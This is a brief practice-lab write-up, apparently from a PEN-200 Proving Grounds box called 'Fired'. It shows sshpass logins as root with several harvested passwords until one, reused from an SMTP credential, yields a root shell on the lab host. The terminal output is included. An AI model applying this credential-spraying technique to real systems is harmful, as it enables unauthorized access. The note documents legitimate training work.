InfoSec LAB

Fired_Privilege_Escalation

Created: 2 min read

SSH

Testing various uncovered credentials against the target SSH server

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fired]
└─$ sshpass -p EOAJUe2Sqdlfqjk ssh root@$IP  
Permission denied, please try again.

passwordKey failed

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fired]
└─$ sshpass -p 'PwnThePlanet@99' ssh root@$IP
Permission denied, please try again.

Decrypted password of the admin user failed

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fired]
└─$ sshpass -p 04qno4 ssh root@$IP
Permission denied, please try again.

Decrypted password of the 04qno4 user failed

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fired]
└─$ sshpass -p OpenFireAtEveryone ssh root@$IP
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-187-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
 System information as of Sun 06 Apr 2025 10:24:01 PM UTC
 
  System load:  0.0                Processes:               242
  Usage of /:   28.1% of 19.52GB   Users logged in:         0
  Memory usage: 21%                IPv4 address for ens160: 192.168.201.96
  Swap usage:   0%
 
 
Expanded Security Maintenance for Applications is not enabled.
 
0 updates can be applied immediately.
 
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
 
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Sun Apr  6 22:17:42 2025 from 192.168.45.249
root@openfire:~# whoami
root
root@openfire:~# hostname
openfire
root@openfire:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:61:84 brd ff:ff:ff:ff:ff:ff
    inet 192.168.201.96/24 brd 192.168.201.255 scope global ens160
       valid_lft forever preferred_lft forever

SMTP credential works System level compromise

Interactive Graph View

Backlinks